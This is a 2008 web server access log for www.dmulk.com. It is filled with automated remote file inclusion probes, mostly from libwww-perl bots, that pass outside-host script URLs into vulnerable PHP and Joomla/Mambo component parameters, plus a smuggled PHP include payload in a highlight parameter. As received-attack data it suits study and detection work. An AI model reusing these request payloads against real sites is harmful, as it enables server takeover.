190.158.238.99 - - [29/May/2008:09:38:39 -0700] "GET /logs//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:38:51 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:38:51 -0700] "GET //common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:38:52 -0700] "GET /logs//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:09:38:57 -0700] "GET /logs/access_080305.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.11.246 - - [29/May/2008:09:39:01 -0700] "GET /logs/access_071111.log HTTP/1.0" 200 72697 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:09:39:10 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:09:39:10 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:09:39:11 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:39:11 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:39:12 -0700] "GET //modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:39:12 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:09:39:15 -0700] "GET /logs/access_080315.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:09:39:16 -0700] "GET /index2.php?content=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:09:39:16 -0700] "GET /logs/index2.php?content=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:09:39:25 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:09:39:25 -0700] "GET /logs/PNphpBB2/includes/functions_admin.php?phpbb_root_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:09:39:30 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.fullscores.com/media/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:09:39:30 -0700] "GET /logs/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.fullscores.com/media/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:39:43 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:39:45 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:39:45 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:09:39:46 -0700] "GET /vCard/admin/define.inc.php?match=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:09:39:46 -0700] "GET /logs/vCard/admin/define.inc.php?match=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:39:55 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:39:55 -0700] "GET //common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:39:56 -0700] "GET /logs//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:40:00 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:40:02 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:40:02 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:40:02 -0700] "GET /classes/core/language.php?rootdir=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:40:02 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:40:02 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:09:40:05 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:40:12 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:40:55 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:40:55 -0700] "GET //login.php?dir=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:40:55 -0700] "GET /logs//login.php?dir=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:09:41:02 -0700] "GET /logs/index.php?redir=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:09:41:04 -0700] "GET /index.php?redir=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:09:41:20 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:42:16 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:09:42:23 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.103.131 - - [29/May/2008:09:42:33 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.103.131 - - [29/May/2008:09:42:49 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:42:50 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:42:50 -0700] "GET //include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:42:51 -0700] "GET /logs/access_080215.log//login.php?dir=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:42:51 -0700] "GET /logs//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:09:42:54 -0700] "GET /logs/access_080125.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:09:42:54 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:42:55 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:43:31 -0700] "GET /logs/access_080119.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_newsfeeds&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:43:56 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:43:56 -0700] "GET /classes/core/language.php?rootdir=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:43:56 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:09:43:59 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.7.234 - - [29/May/2008:09:44:10 -0700] "GET /index.php?pagina=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:44:14 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:44:17 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:44:17 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:44:17 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:09:44:25 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:44:37 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.167.156.20 - - [29/May/2008:09:45:18 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [29/May/2008:09:45:18 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:09:45:36 -0700] "GET /logs/access_080125.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:09:45:36 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:45:57 -0700] "GET /logs/access.log//index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:45:59 -0700] "GET //index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:45:59 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
198.173.255.213 - - [29/May/2008:09:46:08 -0700] "GET /logs/access.log//index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.173.255.213 - - [29/May/2008:09:46:10 -0700] "GET //index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
198.173.255.213 - - [29/May/2008:09:46:10 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.81.28 - - [29/May/2008:09:46:25 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [29/May/2008:09:46:25 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.160.58 - - [29/May/2008:09:47:20 -0700] "GET /logs/access.log//index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
67.19.160.58 - - [29/May/2008:09:47:21 -0700] "GET //index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.802" "www.dmulk.com"
67.19.160.58 - - [29/May/2008:09:47:22 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
70.86.26.122 - - [29/May/2008:09:47:33 -0700] "GET /logs/access_080118.log//pre_admin.php?site_isp_root=http://www.villeneuvedolmes.com/cmsimple/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [29/May/2008:09:47:33 -0700] "GET //pre_admin.php?site_isp_root=http://www.villeneuvedolmes.com/cmsimple/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [29/May/2008:09:47:33 -0700] "GET /logs//pre_admin.php?site_isp_root=http://www.villeneuvedolmes.com/cmsimple/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.90.214 - - [29/May/2008:09:47:34 -0700] "GET //main.php?sayfa=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
62.212.90.214 - - [29/May/2008:09:47:34 -0700] "GET /logs//main.php?sayfa=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:47:36 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:47:37 -0700] "GET //common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:47:37 -0700] "GET /logs//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:48:18 -0700] "GET /logs/access_080310.log/errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.21.71.133 - - [29/May/2008:09:48:18 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/May/2008:09:48:19 -0700] "GET //main.php?sayfa=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/May/2008:09:48:19 -0700] "GET /logs//main.php?sayfa=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:48:20 -0700] "GET /errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.21.71.133 - - [29/May/2008:09:48:20 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:09:48:23 -0700] "GET /logs/access_080131.log/index.php?pagina=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:09:48:24 -0700] "GET /index.php?pagina=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:09:48:24 -0700] "GET /logs/index.php?pagina=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.173.42 - - [29/May/2008:09:48:42 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [29/May/2008:09:48:43 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:09:48:47 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:09:48:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.86.101.159 - - [29/May/2008:09:48:59 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.86.101.159 - - [29/May/2008:09:48:59 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.9.54 - - [29/May/2008:09:49:06 -0700] "GET /plans/?D=A HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.51.132.170 - - [29/May/2008:09:50:03 -0700] "GET //main.php?sayfa=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
209.51.132.170 - - [29/May/2008:09:50:04 -0700] "GET /logs//main.php?sayfa=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:09:50:27 -0700] "GET /logs/access_080215.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_virtuemart&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:09:50:27 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_virtuemart&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:09:50:27 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_virtuemart&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:09:50:31 -0700] "GET /logs/index.php?configFile=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:09:50:33 -0700] "GET /index.php?configFile=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
